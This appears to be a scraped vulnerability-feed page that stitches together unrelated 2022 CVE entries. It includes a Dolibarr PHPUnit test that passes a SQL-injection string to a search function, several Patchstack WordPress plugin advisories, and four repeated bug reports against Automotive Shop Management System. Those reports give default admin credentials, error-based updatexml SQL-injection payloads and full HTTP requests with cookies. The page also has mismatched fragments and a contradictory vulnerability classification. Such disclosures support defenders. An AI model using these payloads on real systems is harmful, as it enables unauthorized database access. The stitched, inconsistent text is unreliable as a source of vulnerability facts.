The My wpdb WordPress plugin before 2.5 is missing CSRF check when running SQL queries, which could allow attacker to make a logged in admin run arbitrary SQL query via a CSRF attack

CVE-2022-1578

SQL injection attacks can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period. This affect 16.0.1 and 16.0.2 only. 16.0.0 or lower, and 16.0.3 or higher are not affected

@@ -0,0 +1,178 @@ <?php /\* Copyright (C) 2010 Laurent Destailleur <eldy@users.sourceforge.net> \* \* This program is free software; you can redistribute it and/or modify \* it under the terms of the GNU General Public License as published by \* the Free Software Foundation; either version 3 of the License, or \* (at your option) any later version. \* \* This program is distributed in the hope that it will be useful, \* but WITHOUT ANY WARRANTY; without even the implied warranty of \* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \* GNU General Public License for more details. \* \* You should have received a copy of the GNU General Public License \* along with this program. If not, see <https://www.gnu.org/licenses/>. \* or see https://www.gnu.org/ \*/  
/\*\* \* \\file test/phpunit/WebsiteTest.php \* \\ingroup test \* \\brief PHPUnit test \* \\remarks To run this script as CLI: phpunit filename.php \*/  
global $conf,$user,$langs,$db; //define('TEST\_DB\_FORCE\_TYPE','mysql'); // This is to force using mysql driver //require\_once 'PHPUnit/Autoload.php';  
if (! defined('NOREQUIRESOC')) { define('NOREQUIRESOC', '1'); } if (! defined('NOCSRFCHECK')) { define('NOCSRFCHECK', '1'); } if (! defined('NOTOKENRENEWAL')) { define('NOTOKENRENEWAL', '1'); } if (! defined('NOREQUIREMENU')) { define('NOREQUIREMENU', '1'); // If there is no menu to show } if (! defined('NOREQUIREHTML')) { define('NOREQUIREHTML', '1'); // If we don't need to load the html.form.class.php } if (! defined('NOREQUIREAJAX')) { define('NOREQUIREAJAX', '1'); } if (! defined("NOLOGIN")) { define("NOLOGIN", '1'); // If this page is public (can be called outside logged session) } if (! defined("NOSESSION")) { define("NOSESSION", '1'); }  
require\_once dirname(\_\_FILE\_\_).'/../../htdocs/main.inc.php'; require\_once dirname(\_\_FILE\_\_).'/../../htdocs/core/lib/website.lib.php';  
  
if (empty($user\->id)) { print "Load permissions for admin user nb 1\\n"; $user\->fetch(1); $user\->getrights(); } $conf\->global\->MAIN\_DISABLE\_ALL\_MAILS\=1;  
  
/\*\* \* Class for PHPUnit tests \* \* @backupGlobals disabled \* @backupStaticAttributes enabled \* @remarks backupGlobals must be disabled to have db,conf,user and lang not erased. \*/ class WebsiteTest extends PHPUnit\\Framework\\TestCase { protected $savconf; protected $savuser; protected $savlangs; protected $savdb;  
/\*\* \* Constructor \* We save global variables into local variables \* \* @return SecurityTest \*/ public function \_\_construct() { parent::\_\_construct();  
//$this->sharedFixture global $conf,$user,$langs,$db; $this\->savconf\=$conf; $this\->savuser\=$user; $this\->savlangs\=$langs; $this\->savdb\=$db;  
print \_\_METHOD\_\_." db->type=".$db\->type." user->id=".$user\->id; //print " - db ".$db->db; print "\\n"; }  
/\*\* \* setUpBeforeClass \* \* @return void \*/ public static function setUpBeforeClass() { global $conf,$user,$langs,$db; $db\->begin(); // This is to have all actions inside a transaction even if test launched without suite.  
print \_\_METHOD\_\_."\\n"; }  
/\*\* \* tearDownAfterClass \* \* @return void \*/ public static function tearDownAfterClass() { global $conf,$user,$langs,$db; $db\->rollback();  
print \_\_METHOD\_\_."\\n"; }  
/\*\* \* Init phpunit tests \* \* @return void \*/ protected function setUp() { global $conf,$user,$langs,$db; $conf\=$this\->savconf; $user\=$this\->savuser; $langs\=$this\->savlangs; $db\=$this\->savdb;  
print \_\_METHOD\_\_."\\n"; }  
/\*\* \* End phpunit tests \* \* @return void \*/ protected function tearDown() { print \_\_METHOD\_\_."\\n"; }  
  
/\*\* \* testGetPagesFromSearchCriterias \* \* @return void \*/ public function testGetPagesFromSearchCriterias() { global $db;  
$s = "123') OR 1=1-- \\' xxx"; /\* var\_dump($s); var\_dump($db->escapeforlike($s)); var\_dump($db->escape($db->escapeforlike($s))); \*/  
$res = getPagesFromSearchCriterias('page,blogpost', 'meta,content', $s, 2, 'date\_creation', 'DESC', 'en'); //var\_dump($res); print \_\_METHOD\_\_." message=".$res\['code'\]."\\n"; // We must found no line (so code should be KO). If we found somethiing, it means there is a SQL injection of the 1=1 $this\->assertEquals($res\['code'\], 'KO'); } }

CVE-2022-4093: Fix sqli ->escape after ->escapeforlike · Dolibarr/dolibarr@7c1eac9

Block BYPASS vulnerability in iQ Block Country plugin <= 1.2.18 on WordPress.

CVE-2022-41155: iQ Block Country

Auth. (subscriber+) Insecure Direct Object References (IDOR) vulnerability in Comments – wpDiscuz plugin 7.4.2 on WordPress.

CVE-2022-43492: Comments – wpDiscuz

Arbitrary Code Execution vulnerability in Api2Cart Bridge Connector plugin <= 1.1.0 on WordPress.

 Verified

 Fixed

**10**

CVSS 3.1 score Critical severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 1.1.0

PSID 

e8ae40303ceb

Classification 

SQL Injection

OWASP Top 10 

A1: Injection

Required privilege 

Can be exploited remotely without any authentication.

Publicly disclosed

2022-10-28

**Details**

Arbitrary Code Execution vulnerability discovered by Dave Jong (Patchstack) in the WordPress Api2Cart Bridge Connector plugin (versions <= 1.1.0).

**Solution**

Update the WordPress Api2Cart Bridge Connector plugin to the latest available version (at least 1.2.0).

**References**

CVE-2022-42497: WordPress Api2Cart Bridge Connector plugin <= 1.1.0 - Arbitrary Code Execution vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Media Library Folders plugin <= 7.1.1 on WordPress.

CVE-2022-41634: Media Library Folders

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/mechanics/manage_mechanic.php?id=.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: huchengrong

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/mechanics/manage\_mechanic.php?id=

Vulnerability location: /asms/admin/mechanics/manage\_mechanic.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/mechanics/manage\_mechanic.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/mechanics/manage\_mechanic.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44413: bug_report/SQLi-3.md at main · huchengrong/bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/mechanics/view_mechanic.php?id=.

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: huchengrong

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/mechanics/view\_mechanic.php?id=

Vulnerability location: /asms/admin/mechanics/view\_mechanic.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/mechanics/view\_mechanic.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/mechanics/view\_mechanic.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44415: bug_report/SQLi-2.md at main · huchengrong/bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/?page=transactions/manage_transaction&id=.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: huchengrong

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/?page=transactions/manage\_transaction&id=

Vulnerability location: /asms/admin/?page=transactions/manage\_transaction&id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/?page=transactions/manage\_transaction&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/?page\=transactions/manage\_transaction&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44820: bug_report/SQLi-4.md at main · huchengrong/bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/services/manage_service.php?id=.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: huchengrong

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/services/manage\_service.php?id=

Vulnerability location: /asms/admin/services/manage\_service.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/services/manage\_service.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/services/manage\_service.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

Tag

#sql